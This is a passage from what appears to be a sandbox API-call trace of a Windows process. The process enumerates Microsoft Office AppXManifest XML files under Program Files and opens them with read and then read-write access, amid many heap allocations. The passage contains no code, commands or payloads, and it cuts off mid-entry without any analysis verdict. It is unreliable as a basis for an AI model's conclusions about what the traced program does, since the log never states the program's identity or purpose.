Flags=0x0, Size=0x20) returned 0x88450 [0099.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0099.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0099.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0099.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0099.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0099.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0099.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0099.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0099.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0099.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0099.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0099.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0099.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0099.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0099.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0099.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0099.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0099.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0099.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0099.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0099.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0099.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0099.271] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0099.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0099.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0099.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0099.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0099.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0099.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0099.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0099.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0099.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0099.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0099.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0099.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0099.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0099.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0099.272] AreFileApisANSI () returned 1 [0099.272] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76278, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0099.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0099.272] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76278, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml") returned 105 [0099.272] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012a-0000-1000-0000000ff1ce.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x83485006, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x83485006, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x834ab261, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x80e56)) returned 1 [0099.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0099.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0099.272] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.272] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.272] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x834d1316, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x834d1316, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x84214453, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ed, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml", cAlternateFileName="APE0B7~1.XML")) returned 1 [0099.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0099.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0099.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0099.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68ea0 [0099.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0099.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46048 [0099.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68ea0 | out: hHeap=0x20000) returned 1 [0099.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8c650 [0099.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46048 | out: hHeap=0x20000) returned 1 [0099.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0099.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0099.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0099.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0099.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0099.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c650 | out: hHeap=0x20000) returned 1 [0099.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0099.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0099.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0099.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0099.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0099.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0099.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0099.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0099.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0099.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0099.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0099.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x88c48 [0099.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0099.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0099.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x89640 [0099.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88c48 | out: hHeap=0x20000) returned 1 [0099.273] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.273] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.273] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.273] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x89640 | out: hHeap=0x20000) returned 1 [0099.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0099.273] AreFileApisANSI () returned 1 [0099.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 105 [0099.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0099.273] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.273] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0099.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0099.274] AreFileApisANSI () returned 1 [0099.274] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75f30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0099.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0099.274] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75f30, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml") returned 105 [0099.274] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012b-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0099.274] GetFileType (hFile=0x360) returned 0x1 [0099.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.274] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0099.274] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0099.275] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0099.275] CloseHandle (hObject=0x360) returned 1 [0099.275] AreFileApisANSI () returned 1 [0099.275] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75f30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0099.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0099.275] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75f30, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml") returned 105 [0099.275] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012b-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0099.275] GetFileType (hFile=0x360) returned 0x1 [0099.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.275] CloseHandle (hObject=0x360) returned 1 [0099.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0099.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0099.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0099.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0099.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0099.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0099.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0099.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0099.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0099.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0099.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0099.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0099.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0099.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0099.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0099.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0099.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0099.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0099.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0099.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0099.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0099.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0099.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0099.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0099.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0099.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0099.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0099.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0099.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0099.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0099.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0099.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0099.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0099.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0099.277] AreFileApisANSI () returned 1 [0099.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75f30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0099.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0099.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75f30, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml") returned 105 [0099.277] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012b-0409-1000-0000000ff1ce.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x834d1316, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x834d1316, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x84214453, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ed)) returned 1 [0099.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0099.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0099.277] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.277] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.277] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x83ea71ba, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x83ea71ba, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x84214453, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xd2f, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml", cAlternateFileName="AP8BF9~1.XML")) returned 1 [0099.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0099.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0099.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0099.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68fe0 [0099.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0099.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46ac8 [0099.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68fe0 | out: hHeap=0x20000) returned 1 [0099.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8d220 [0099.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ac8 | out: hHeap=0x20000) returned 1 [0099.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0099.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0099.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0099.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0099.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0099.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d220 | out: hHeap=0x20000) returned 1 [0099.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0099.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0099.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0099.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0099.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0099.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0099.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0099.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0099.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0099.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0099.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0099.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x899e0 [0099.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0099.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0099.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x898f8 [0099.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x899e0 | out: hHeap=0x20000) returned 1 [0099.278] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.278] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.278] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.278] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, 